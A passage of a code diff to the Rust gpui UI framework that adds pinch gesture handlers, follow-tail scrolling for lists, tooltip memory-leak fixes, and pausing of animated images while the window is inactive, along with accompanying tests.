+ /// The fluent API equivalent to [`Interactivity::on_pinch`]. + /// + /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback. + fn on_pinch(mut self, listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static) -> Self { + self.interactivity().on_pinch(listener); + self + } + + /// Bind the given callback to pinch gesture events during the capture phase. + /// The fluent API equivalent to [`Interactivity::capture_pinch`]. + /// + /// See [`Context::listener`](crate::Context::listener) to get access to a view's state from this callback. + fn capture_pinch( + mut self, + listener: impl Fn(&PinchEvent, &mut Window, &mut App) + 'static, + ) -> Self { + self.interactivity().capture_pinch(listener); + self + } /// Capture the given action, before normal action dispatch can fire. /// The fluent API equivalent to [`Interactivity::capture_action`]. /// @@ -1290,6 +1344,9 @@ pub(crate) type MouseMoveListener = pub(crate) type ScrollWheelListener = Box; +pub(crate) type PinchListener = + Box; + pub(crate) type ClickListener = Rc; pub(crate) type DragListener = @@ -1644,6 +1701,7 @@ pub struct Interactivity { pub(crate) mouse_pressure_listeners: Vec, pub(crate) mouse_move_listeners: Vec, pub(crate) scroll_wheel_listeners: Vec, + pub(crate) pinch_listeners: Vec, pub(crate) key_down_listeners: Vec, pub(crate) key_up_listeners: Vec, pub(crate) modifiers_changed_listeners: Vec, @@ -1847,6 +1905,7 @@ impl Interactivity { || !self.click_listeners.is_empty() || !self.aux_click_listeners.is_empty() || !self.scroll_wheel_listeners.is_empty() + || self.has_pinch_listeners() || self.drag_listener.is_some() || !self.drop_listeners.is_empty() || self.tooltip_builder.is_some() @@ -1886,18 +1945,18 @@ impl Interactivity { // high for the maximum scroll, we round the scroll max to 2 decimal // places here. 
let padded_content_size = self.content_size + padding_size; - let scroll_max = (padded_content_size - bounds.size) + let scroll_max = Point::from(padded_content_size - bounds.size) .map(round_to_two_decimals) .max(&Default::default()); // Clamp scroll offset in case scroll max is smaller now (e.g., if children // were removed or the bounds became larger). let mut scroll_offset = scroll_offset.borrow_mut(); - scroll_offset.x = scroll_offset.x.clamp(-scroll_max.width, px(0.)); + scroll_offset.x = scroll_offset.x.clamp(-scroll_max.x, px(0.)); if scroll_to_bottom { - scroll_offset.y = -scroll_max.height; + scroll_offset.y = -scroll_max.y; } else { - scroll_offset.y = scroll_offset.y.clamp(-scroll_max.height, px(0.)); + scroll_offset.y = scroll_offset.y.clamp(-scroll_max.y, px(0.)); } if let Some(mut scroll_handle_state) = tracked_scroll_handle { @@ -2213,6 +2272,13 @@ impl Interactivity { }) } + for listener in self.pinch_listeners.drain(..) { + let hitbox = hitbox.clone(); + window.on_mouse_event(move |event: &PinchEvent, phase, window, cx| { + listener(event, phase, &hitbox, window, cx); + }) + } + if self.hover_style.is_some() || self.base_style.mouse_cursor.is_some() || cx.active_drag.is_some() && !self.drag_over_styles.is_empty() @@ -2497,7 +2563,8 @@ impl Interactivity { let pending_mouse_down = pending_mouse_down.clone(); let source_bounds = hitbox.bounds; move |window: &Window| { - pending_mouse_down.borrow().is_none() + !window.last_input_was_keyboard() + && pending_mouse_down.borrow().is_none() && source_bounds.contains(&window.mouse_position()) } }); @@ -2517,18 +2584,24 @@ impl Interactivity { ); } + // We unconditionally bind both the mouse up and mouse down active state handlers + // Because we might not get a chance to render a frame before the mouse up event arrives. 
let active_state = element_state .clicked_state .get_or_insert_with(Default::default) .clone(); - if active_state.borrow().is_clicked() { + + { + let active_state = active_state.clone(); window.on_mouse_event(move |_: &MouseUpEvent, phase, window, _cx| { - if phase == DispatchPhase::Capture { + if phase == DispatchPhase::Capture && active_state.borrow().is_clicked() { *active_state.borrow_mut() = ElementClickedState::default(); window.refresh(); } }); - } else { + } + + { let active_group_hitbox = self .group_active_style .as_ref() @@ -2994,21 +3067,29 @@ fn handle_tooltip_mouse_move( } Action::ScheduleShow => { let delayed_show_task = window.spawn(cx, { - let active_tooltip = active_tooltip.clone(); + let weak_active_tooltip = Rc::downgrade(active_tooltip); let build_tooltip = build_tooltip.clone(); let check_is_hovered_during_prepaint = check_is_hovered_during_prepaint.clone(); async move |cx| { cx.background_executor().timer(TOOLTIP_SHOW_DELAY).await; + let Some(active_tooltip) = weak_active_tooltip.upgrade() else { + return; + }; cx.update(|window, cx| { let new_tooltip = build_tooltip(window, cx).map(|(view, tooltip_is_hoverable)| { - let active_tooltip = active_tooltip.clone(); + let weak_active_tooltip = Rc::downgrade(&active_tooltip); ActiveTooltip::Visible { tooltip: AnyTooltip { view, mouse_position: window.mouse_position(), check_visible_and_update: Rc::new( move |tooltip_bounds, window, cx| { + let Some(active_tooltip) = + weak_active_tooltip.upgrade() + else { + return false; + }; handle_tooltip_check_visible_and_update( &active_tooltip, tooltip_is_hoverable, @@ -3087,11 +3168,14 @@ fn handle_tooltip_check_visible_and_update( Action::Hide => clear_active_tooltip(active_tooltip, window), Action::ScheduleHide(tooltip) => { let delayed_hide_task = window.spawn(cx, { - let active_tooltip = active_tooltip.clone(); + let weak_active_tooltip = Rc::downgrade(active_tooltip); async move |cx| { cx.background_executor() .timer(HOVERABLE_TOOLTIP_HIDE_DELAY) 
.await; + let Some(active_tooltip) = weak_active_tooltip.upgrade() else { + return; + }; if active_tooltip.borrow_mut().take().is_some() { cx.update(|window, _cx| window.refresh()).ok(); } @@ -3285,7 +3369,7 @@ impl ScrollAnchor { struct ScrollHandleState { offset: Rc>>, bounds: Bounds, - max_offset: Size, + max_offset: Point, child_bounds: Vec>, scroll_to_bottom: bool, overflow: Point, @@ -3329,7 +3413,7 @@ impl ScrollHandle { } /// Get the maximum scroll offset. - pub fn max_offset(&self) -> Size { + pub fn max_offset(&self) -> Point { self.0.borrow().max_offset } @@ -3504,6 +3588,112 @@ impl ScrollHandle { #[cfg(test)] mod tests { use super::*; + use crate::{AppContext as _, Context, InputEvent, MouseMoveEvent, TestAppContext}; + use std::rc::Weak; + + struct TestTooltipView; + + impl Render for TestTooltipView { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + div().w(px(20.)).h(px(20.)).child("tooltip") + } + } + + type CapturedActiveTooltip = Rc>>>>>; + + struct TooltipCaptureElement { + child: AnyElement, + captured_active_tooltip: CapturedActiveTooltip, + } + + impl IntoElement for TooltipCaptureElement { + type Element = Self; + + fn into_element(self) -> Self::Element { + self + } + } + + impl Element for TooltipCaptureElement { + type RequestLayoutState = (); + type PrepaintState = (); + + fn id(&self) -> Option { + None + } + + fn source_location(&self) -> Option<&'static core::panic::Location<'static>> { + None + } + + fn request_layout( + &mut self, + _id: Option<&GlobalElementId>, + _inspector_id: Option<&InspectorElementId>, + window: &mut Window, + cx: &mut App, + ) -> (LayoutId, Self::RequestLayoutState) { + (self.child.request_layout(window, cx), ()) + } + + fn prepaint( + &mut self, + _id: Option<&GlobalElementId>, + _inspector_id: Option<&InspectorElementId>, + _bounds: Bounds, + _request_layout: &mut Self::RequestLayoutState, + window: &mut Window, + cx: &mut App, + ) -> Self::PrepaintState { + 
self.child.prepaint(window, cx); + } + + fn paint( + &mut self, + _id: Option<&GlobalElementId>, + _inspector_id: Option<&InspectorElementId>, + _bounds: Bounds, + _request_layout: &mut Self::RequestLayoutState, + _prepaint: &mut Self::PrepaintState, + window: &mut Window, + cx: &mut App, + ) { + self.child.paint(window, cx); + window.with_global_id("target".into(), |global_id, window| { + window.with_element_state::( + global_id, + |state, _window| { + let state = state.unwrap(); + *self.captured_active_tooltip.borrow_mut() = + state.active_tooltip.as_ref().map(Rc::downgrade); + ((), state) + }, + ) + }); + } + } + + struct TooltipOwner { + captured_active_tooltip: CapturedActiveTooltip, + } + + impl Render for TooltipOwner { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + TooltipCaptureElement { + child: div() + .size_full() + .child( + div() + .id("target") + .w(px(50.)) + .h(px(50.)) + .tooltip(|_, cx| cx.new(|_| TestTooltipView).into()), + ) + .into_any_element(), + captured_active_tooltip: self.captured_active_tooltip.clone(), + } + } + } #[test] fn scroll_handle_aligns_wide_children_to_left_edge() { @@ -3542,4 +3732,96 @@ mod tests { assert_eq!(handle.offset().y, px(-25.)); } + + fn setup_tooltip_owner_test() -> ( + TestAppContext, + crate::AnyWindowHandle, + CapturedActiveTooltip, + ) { + let mut test_app = TestAppContext::single(); + let captured_active_tooltip: CapturedActiveTooltip = Rc::new(RefCell::new(None)); + let window = test_app.add_window({ + let captured_active_tooltip = captured_active_tooltip.clone(); + move |_, _| TooltipOwner { + captured_active_tooltip, + } + }); + let any_window = window.into(); + + test_app + .update_window(any_window, |_, window, cx| { + window.draw(cx).clear(); + }) + .unwrap(); + + test_app + .update_window(any_window, |_, window, cx| { + window.dispatch_event( + MouseMoveEvent { + position: point(px(10.), px(10.)), + modifiers: Default::default(), + pressed_button: None, + } + 
.to_platform_input(), + cx, + ); + }) + .unwrap(); + + test_app + .update_window(any_window, |_, window, cx| { + window.draw(cx).clear(); + }) + .unwrap(); + + (test_app, any_window, captured_active_tooltip) + } + + #[test] + fn tooltip_waiting_for_show_is_released_when_its_owner_disappears() { + let (mut test_app, any_window, captured_active_tooltip) = setup_tooltip_owner_test(); + + let weak_active_tooltip = captured_active_tooltip.borrow().clone().unwrap(); + let active_tooltip = weak_active_tooltip.upgrade().unwrap(); + assert!(matches!( + active_tooltip.borrow().as_ref(), + Some(ActiveTooltip::WaitingForShow { .. }) + )); + + test_app + .update_window(any_window, |_, window, _| { + window.remove_window(); + }) + .unwrap(); + test_app.run_until_parked(); + drop(active_tooltip); + + assert!(weak_active_tooltip.upgrade().is_none()); + } + + #[test] + fn tooltip_is_released_when_its_owner_disappears() { + let (mut test_app, any_window, captured_active_tooltip) = setup_tooltip_owner_test(); + + let weak_active_tooltip = captured_active_tooltip.borrow().clone().unwrap(); + let active_tooltip = weak_active_tooltip.upgrade().unwrap(); + + test_app.dispatcher.advance_clock(TOOLTIP_SHOW_DELAY); + test_app.run_until_parked(); + + assert!(matches!( + active_tooltip.borrow().as_ref(), + Some(ActiveTooltip::Visible { .. 
}) + )); + + test_app + .update_window(any_window, |_, window, _| { + window.remove_window(); + }) + .unwrap(); + test_app.run_until_parked(); + drop(active_tooltip); + + assert!(weak_active_tooltip.upgrade().is_none()); + } } diff --git a/crates/gpui/src/elements/img.rs b/crates/gpui/src/elements/img.rs index 875f9e6dc1cc7d248f9e70488e52480dcca53fa3..ccd4123048c22fda796ec3ae9d367209d4974c38 100644 --- a/crates/gpui/src/elements/img.rs +++ b/crates/gpui/src/elements/img.rs @@ -315,20 +315,24 @@ impl Element for Img { if let Some(state) = &mut state { let frame_count = data.frame_count(); if frame_count > 1 { - let current_time = Instant::now(); - if let Some(last_frame_time) = state.last_frame_time { - let elapsed = current_time - last_frame_time; - let frame_duration = - Duration::from(data.delay(state.frame_index)); - - if elapsed >= frame_duration { - state.frame_index = - (state.frame_index + 1) % frame_count; - state.last_frame_time = - Some(current_time - (elapsed - frame_duration)); + if window.is_window_active() { + let current_time = Instant::now(); + if let Some(last_frame_time) = state.last_frame_time { + let elapsed = current_time - last_frame_time; + let frame_duration = + Duration::from(data.delay(state.frame_index)); + + if elapsed >= frame_duration { + state.frame_index = + (state.frame_index + 1) % frame_count; + state.last_frame_time = + Some(current_time - (elapsed - frame_duration)); + } + } else { + state.last_frame_time = Some(current_time); } } else { - state.last_frame_time = Some(current_time); + state.last_frame_time = None; } } state.started_loading = None; @@ -365,7 +369,10 @@ impl Element for Img { }; } - if global_id.is_some() && data.frame_count() > 1 { + if global_id.is_some() + && data.frame_count() > 1 + && window.is_window_active() + { window.request_animation_frame(); } } @@ -697,7 +704,7 @@ impl Asset for ImageAssetLoader { Ok(Arc::new(RenderImage::new(data))) } else { svg_renderer - .render_single_frame(&bytes, 1.0, true) + 
.render_single_frame(&bytes, 1.0) .map_err(Into::into) } } diff --git a/crates/gpui/src/elements/list.rs b/crates/gpui/src/elements/list.rs index 5403bf10eb9a078dfd113462644636b49d1840e4..5a88d81c18db5e790b7bbed0fb9def23bc973e14 100644 --- a/crates/gpui/src/elements/list.rs +++ b/crates/gpui/src/elements/list.rs @@ -72,6 +72,7 @@ struct StateInner { scrollbar_drag_start_height: Option, measuring_behavior: ListMeasuringBehavior, pending_scroll: Option, + follow_state: FollowState, } /// Keeps track of a fractional scroll position within an item for restoration @@ -83,6 +84,49 @@ struct PendingScrollFraction { fraction: f32, } +/// Controls whether the list automatically follows new content at the end. +#[derive(Clone, Copy, Debug, Default, Eq, PartialEq)] +pub enum FollowMode { + /// Normal scrolling — no automatic following. + #[default] + Normal, + /// The list should auto-scroll along with the tail, when scrolled to bottom. + Tail, +} + +#[derive(Clone, Copy, Debug, Default, Eq, PartialEq)] +enum FollowState { + #[default] + Normal, + Tail { + is_following: bool, + }, +} + +impl FollowState { + fn is_following(&self) -> bool { + matches!(self, FollowState::Tail { is_following: true }) + } + + fn has_stopped_following(&self) -> bool { + matches!( + self, + FollowState::Tail { + is_following: false + } + ) + } + + fn start_following(&mut self) { + if let FollowState::Tail { + is_following: false, + } = self + { + *self = FollowState::Tail { is_following: true }; + } + } +} + /// Whether the list is scrolling from top to bottom or bottom to top. #[derive(Clone, Copy, Debug, Eq, PartialEq)] pub enum ListAlignment { @@ -102,6 +146,9 @@ pub struct ListScrollEvent { /// Whether the list has been scrolled. pub is_scrolled: bool, + + /// Whether the list is currently in follow-tail mode (auto-scrolling to end). + pub is_following_tail: bool, } /// The sizing behavior to apply during layout. 
@@ -165,6 +212,7 @@ pub struct ListPrepaintState { #[derive(Clone)] enum ListItem { Unmeasured { + size_hint: Option>, focus_handle: Option, }, Measured { @@ -182,9 +230,16 @@ impl ListItem { } } + fn size_hint(&self) -> Option> { + match self { + ListItem::Measured { size, .. } => Some(*size), + ListItem::Unmeasured { size_hint, .. } => *size_hint, + } + } + fn focus_handle(&self) -> Option { match self { - ListItem::Unmeasured { focus_handle } | ListItem::Measured { focus_handle, .. } => { + ListItem::Unmeasured { focus_handle, .. } | ListItem::Measured { focus_handle, .. } => { focus_handle.clone() } } @@ -192,7 +247,7 @@ impl ListItem { fn contains_focused(&self, window: &Window, cx: &App) -> bool { match self { - ListItem::Unmeasured { focus_handle } | ListItem::Measured { focus_handle, .. } => { + ListItem::Unmeasured { focus_handle, .. } | ListItem::Measured { focus_handle, .. } => { focus_handle .as_ref() .is_some_and(|handle| handle.contains_focused(window, cx)) @@ -236,6 +291,7 @@ impl ListState { scrollbar_drag_start_height: None, measuring_behavior: ListMeasuringBehavior::default(), pending_scroll: None, + follow_state: FollowState::default(), }))); this.splice(0..0, item_count); this @@ -270,37 +326,63 @@ impl ListState { /// Use this when item heights may have changed (e.g., font size changes) /// but the number and identity of items remains the same. pub fn remeasure(&self) { - let state = &mut *self.0.borrow_mut(); + let count = self.item_count(); + self.remeasure_items(0..count); + } - let new_items = state.items.iter().map(|item| ListItem::Unmeasured { - focus_handle: item.focus_handle(), - }); + /// Mark items in `range` as needing remeasurement while preserving + /// the current scroll position. Unlike [`Self::splice`], this does + /// not change the number of items or blow away `logical_scroll_top`. 
+ /// + /// Use this when an item's content has changed and its rendered + /// height may be different (e.g., streaming text, tool results + /// loading), but the item itself still exists at the same index. + pub fn remeasure_items(&self, range: Range) { + let state = &mut *self.0.borrow_mut(); - // If there's a `logical_scroll_top`, we need to keep track of it as a - // `PendingScrollFraction`, so we can later preserve that scroll - // position proportionally to the item, in case the item's height - // changes. + // If the scroll-top item falls within the remeasured range, + // store a fractional offset so the layout can restore the + // proportional scroll position after the item is re-rendered + // at its new height. if let Some(scroll_top) = state.logical_scroll_top { - let mut cursor = state.items.cursor::(()); - cursor.seek(&Count(scroll_top.item_ix), Bias::Right); - - if let Some(item) = cursor.item() { - if let Some(size) = item.size() { - let fraction = if size.height.0 > 0.0 { - (scroll_top.offset_in_item.0 / size.height.0).clamp(0.0, 1.0) - } else { - 0.0 - }; + if range.contains(&scroll_top.item_ix) { + let mut cursor = state.items.cursor::(()); + cursor.seek(&Count(scroll_top.item_ix), Bias::Right); - state.pending_scroll = Some(PendingScrollFraction { - item_ix: scroll_top.item_ix, - fraction, - }); + if let Some(item) = cursor.item() { + if let Some(size) = item.size() { + let fraction = if size.height.0 > 0.0 { + (scroll_top.offset_in_item.0 / size.height.0).clamp(0.0, 1.0) + } else { + 0.0 + }; + + state.pending_scroll = Some(PendingScrollFraction { + item_ix: scroll_top.item_ix, + fraction, + }); + } } } } - state.items = SumTree::from_iter(new_items, ()); + // Rebuild the tree, replacing items in the range with + // Unmeasured copies that keep their focus handles. 
+ let new_items = { + let mut cursor = state.items.cursor::(()); + let mut new_items = cursor.slice(&Count(range.start), Bias::Right); + let invalidated = cursor.slice(&Count(range.end), Bias::Right); + new_items.extend( + invalidated.iter().map(|item| ListItem::Unmeasured { + size_hint: item.size_hint(), + focus_handle: item.focus_handle(), + }), + (), + ); + new_items.append(cursor.suffix(), ()); + new_items + }; + state.items = new_items; state.measuring_behavior.reset(); } @@ -334,7 +416,10 @@ impl ListState { new_items.extend( focus_handles.into_iter().map(|focus_handle| { spliced_count += 1; - ListItem::Unmeasured { focus_handle } + ListItem::Unmeasured { + size_hint: None, + focus_handle, + } }), (), ); @@ -377,6 +462,13 @@ impl ListState { let current_offset = self.logical_scroll_top(); let state = &mut *self.0.borrow_mut(); + + if distance < px(0.) { + if let FollowState::Tail { is_following } = &mut state.follow_state { + *is_following = false; + } + } + let mut cursor = state.items.cursor::(()); cursor.seek(&Count(current_offset.item_ix), Bias::Right); @@ -394,6 +486,54 @@ impl ListState { }); } + /// Scroll the list to the very end (past the last item). + /// + /// Unlike [`scroll_to_reveal_item`], this uses the total item count as the + /// anchor, so the list's layout pass will walk backwards from the end and + /// always show the bottom of the last item — even when that item is still + /// growing (e.g. during streaming). + pub fn scroll_to_end(&self) { + let state = &mut *self.0.borrow_mut(); + let item_count = state.items.summary().count; + state.logical_scroll_top = Some(ListOffset { + item_ix: item_count, + offset_in_item: px(0.), + }); + } + + /// Set the follow mode for the list. In `Tail` mode, the list + /// will auto-scroll to the end and re-engage after the user + /// scrolls back to the bottom. In `Normal` mode, no automatic + /// following occurs. 
+ pub fn set_follow_mode(&self, mode: FollowMode) { + let state = &mut *self.0.borrow_mut(); + + match mode { + FollowMode::Normal => { + state.follow_state = FollowState::Normal; + } + FollowMode::Tail => { + state.follow_state = FollowState::Tail { is_following: true }; + if matches!(mode, FollowMode::Tail) { + let item_count = state.items.summary().count; + state.logical_scroll_top = Some(ListOffset { + item_ix: item_count, + offset_in_item: px(0.), + }); + } + } + } + } + + /// Returns whether the list is currently actively following the + /// tail (snapping to the end on each layout). + pub fn is_following_tail(&self) -> bool { + matches!( + self.0.borrow().follow_state, + FollowState::Tail { is_following: true } + ) + } + /// Scroll the list to the given offset pub fn scroll_to(&self, mut scroll_top: ListOffset) { let state = &mut *self.0.borrow_mut(); @@ -403,6 +543,12 @@ impl ListState { scroll_top.offset_in_item = px(0.); } + if scroll_top.item_ix < item_count { + if let FollowState::Tail { is_following } = &mut state.follow_state { + *is_following = false; + } + } + state.logical_scroll_top = Some(scroll_top); } @@ -491,20 +637,19 @@ impl ListState { /// Returns the maximum scroll offset according to the items we have measured. /// This value remains constant while dragging to prevent the scrollbar from moving away unexpectedly. 
- pub fn max_offset_for_scrollbar(&self) -> Size { + pub fn max_offset_for_scrollbar(&self) -> Point { let state = self.0.borrow(); - let bounds = state.last_layout_bounds.unwrap_or_default(); - - let height = state - .scrollbar_drag_start_height - .unwrap_or_else(|| state.items.summary().height); - - Size::new(Pixels::ZERO, Pixels::ZERO.max(height - bounds.size.height)) + point(Pixels::ZERO, state.max_scroll_offset()) } /// Returns the current scroll offset adjusted for the scrollbar pub fn scroll_px_offset_for_scrollbar(&self) -> Point { let state = &self.0.borrow(); + + if state.logical_scroll_top.is_none() && state.alignment == ListAlignment::Bottom { + return Point::new(px(0.), -state.max_scroll_offset()); + } + let logical_scroll_top = state.logical_scroll_top(); let mut cursor = state.items.cursor::(()); @@ -526,6 +671,14 @@ impl ListState { } impl StateInner { + fn max_scroll_offset(&self) -> Pixels { + let bounds = self.last_layout_bounds.unwrap_or_default(); + let height = self + .scrollbar_drag_start_height + .unwrap_or_else(|| self.items.summary().height); + (height - bounds.size.height).max(px(0.)) + } + fn visible_range( items: &SumTree, height: Pixels, @@ -574,6 +727,12 @@ impl StateInner { }); } + if let FollowState::Tail { is_following } = &mut self.follow_state { + if delta.y > px(0.) 
{ + *is_following = false; + } + } + if let Some(handler) = self.scroll_handler.as_mut() { let visible_range = Self::visible_range(&self.items, height, scroll_top); handler( @@ -581,6 +740,10 @@ impl StateInner { visible_range, count: self.items.summary().count, is_scrolled: self.logical_scroll_top.is_some(), + is_following_tail: matches!( + self.follow_state, + FollowState::Tail { is_following: true } + ), }, window, cx, @@ -670,6 +833,15 @@ impl StateInner { let mut rendered_height = padding.top; let mut max_item_width = px(0.); let mut scroll_top = self.logical_scroll_top(); + + if self.follow_state.is_following() { + scroll_top = ListOffset { + item_ix: self.items.summary().count, + offset_in_item: px(0.), + }; + self.logical_scroll_top = Some(scroll_top); + } + let mut rendered_focused_item = false; let available_item_space = size( @@ -815,6 +987,18 @@ impl StateInner { new_items.append(cursor.suffix(), ()); self.items = new_items; + // If follow_tail mode is on but the user scrolled away + // (is_following is false), check whether the current scroll + // position has returned to the bottom. + if self.follow_state.has_stopped_following() { + let padding = self.last_padding.unwrap_or_default(); + let total_height = self.items.summary().height + padding.top + padding.bottom; + let scroll_offset = self.scroll_top(&scroll_top); + if scroll_offset + available_height >= total_height - px(1.0) { + self.follow_state.start_following(); + } + } + // If none of the visible items are focused, check if an off-screen item is focused // and include it to be rendered after the visible items so keyboard interaction continues // to work for it. 
@@ -951,6 +1135,8 @@ impl StateInner { content_height - self.scrollbar_drag_start_height.unwrap_or(content_height); let new_scroll_top = (point.y - drag_offset).abs().max(px(0.)).min(scroll_max); + self.follow_state = FollowState::Normal; + if self.alignment == ListAlignment::Bottom && new_scroll_top == scroll_max { self.logical_scroll_top = None; } else { @@ -1097,12 +1283,14 @@ impl Element for List { { let new_items = SumTree::from_iter( state.items.iter().map(|item| ListItem::Unmeasured { + size_hint: None, focus_handle: item.focus_handle(), }), (), ); state.items = new_items; + state.measuring_behavior.reset(); } let padding = style @@ -1182,11 +1370,18 @@ impl sum_tree::Item for ListItem { fn summary(&self, _: ()) -> Self::Summary { match self { - ListItem::Unmeasured { focus_handle } => ListItemSummary { + ListItem::Unmeasured { + size_hint, + focus_handle, + } => ListItemSummary { count: 1, rendered_count: 0, unrendered_count: 1, - height: px(0.), + height: if let Some(size) = size_hint { + size.height + } else { + px(0.) 
+ }, has_focus_handles: focus_handle.is_some(), }, ListItem::Measured { @@ -1256,8 +1451,8 @@ mod test { use std::rc::Rc; use crate::{ - self as gpui, AppContext, Context, Element, IntoElement, ListState, Render, Styled, - TestAppContext, Window, div, list, point, px, size, + self as gpui, AppContext, Context, Element, FollowMode, IntoElement, ListState, Render, + Styled, TestAppContext, Window, div, list, point, px, size, }; #[gpui::test] @@ -1348,6 +1543,41 @@ mod test { assert_eq!(offset.offset_in_item, px(0.)); } + #[gpui::test] + fn test_measure_all_after_width_change(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)).measure_all(); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + // First draw at width 100: all 10 items measured (total 500px). + // Viewport is 200px, so max scroll offset should be 300px. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert_eq!(state.max_offset_for_scrollbar().y, px(300.)); + + // Second draw at a different width: items get invalidated. + // Without the fix, max_offset would drop because unmeasured items + // contribute 0 height. 
+ cx.draw(point(px(0.), px(0.)), size(px(200.), px(200.)), |_, _| { + view.into_any_element() + }); + assert_eq!(state.max_offset_for_scrollbar().y, px(300.)); + } + #[gpui::test] fn test_remeasure(cx: &mut TestAppContext) { let cx = cx.add_empty_window(); @@ -1413,4 +1643,454 @@ mod test { assert_eq!(offset.item_ix, 2); assert_eq!(offset.offset_in_item, px(20.)); } + + #[gpui::test] + fn test_follow_tail_stays_at_bottom_as_items_grow(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items, each 50px tall → 500px total content, 200px viewport. + // With follow-tail on, the list should always show the bottom. + let item_height = Rc::new(Cell::new(50usize)); + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)); + + struct TestView { + state: ListState, + item_height: Rc>, + } + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + let height = self.item_height.get(); + list(self.state.clone(), move |_, _, _| { + div().h(px(height as f32)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let state_clone = state.clone(); + let item_height_clone = item_height.clone(); + let view = cx.update(|_, cx| { + cx.new(|_| TestView { + state: state_clone, + item_height: item_height_clone, + }) + }); + + state.set_follow_mode(FollowMode::Tail); + + // First paint — items are 50px, total 500px, viewport 200px. + // Follow-tail should anchor to the end. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + + // The scroll should be at the bottom: the last visible items fill the + // 200px viewport from the end of 500px of content (offset 300px). + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 6); + assert_eq!(offset.offset_in_item, px(0.)); + assert!(state.is_following_tail()); + + // Simulate items growing (e.g. streaming content makes each item taller). + // 10 items × 80px = 800px total. 
+ item_height.set(80); + state.remeasure(); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.into_any_element() + }); + + // After growth, follow-tail should have re-anchored to the new end. + // 800px total − 200px viewport = 600px offset → item 7 at offset 40px, + // but follow-tail anchors to item_count (10), and layout walks back to + // fill 200px, landing at item 7 (7 × 80 = 560, 800 − 560 = 240 > 200, + // so item 8: 8 × 80 = 640, 800 − 640 = 160 < 200 → keeps walking → + // item 7: offset = 800 − 200 = 600, item_ix = 600/80 = 7, remainder 40). + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 7); + assert_eq!(offset.offset_in_item, px(40.)); + assert!(state.is_following_tail()); + } + + #[gpui::test] + fn test_follow_tail_disengages_on_user_scroll(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items × 50px = 500px total, 200px viewport. + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + state.set_follow_mode(FollowMode::Tail); + + // Paint with follow-tail — scroll anchored to the bottom. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, cx| { + cx.new(|_| TestView(state.clone())).into_any_element() + }); + assert!(state.is_following_tail()); + + // Simulate the user scrolling up. + // This should disengage follow-tail. 
+ cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(100.))), + ..Default::default() + }); + + assert!( + !state.is_following_tail(), + "follow-tail should disengage when the user scrolls toward the start" + ); + } + + #[gpui::test] + fn test_follow_tail_disengages_on_scrollbar_reposition(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items × 50px = 500px total, 200px viewport. + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)).measure_all(); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + state.set_follow_mode(FollowMode::Tail); + + // Paint with follow-tail — scroll anchored to the bottom. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!(state.is_following_tail()); + + // Simulate the scrollbar moving the viewport to the middle. + // `set_offset_from_scrollbar` accepts a positive distance from the start. + state.set_offset_from_scrollbar(point(px(0.), px(150.))); + + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 3); + assert_eq!(offset.offset_in_item, px(0.)); + assert!( + !state.is_following_tail(), + "follow-tail should disengage when the scrollbar manually repositions the list" + ); + + // A subsequent draw should preserve the user's manual position instead + // of snapping back to the end. 
+ cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.into_any_element() + }); + + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 3); + assert_eq!(offset.offset_in_item, px(0.)); + } + + #[gpui::test] + fn test_set_follow_tail_snaps_to_bottom(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items × 50px = 500px total, 200px viewport. + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + // Scroll to the middle of the list (item 3). + state.scroll_to(gpui::ListOffset { + item_ix: 3, + offset_in_item: px(0.), + }); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + + let offset = state.logical_scroll_top(); + assert_eq!(offset.item_ix, 3); + assert_eq!(offset.offset_in_item, px(0.)); + assert!(!state.is_following_tail()); + + // 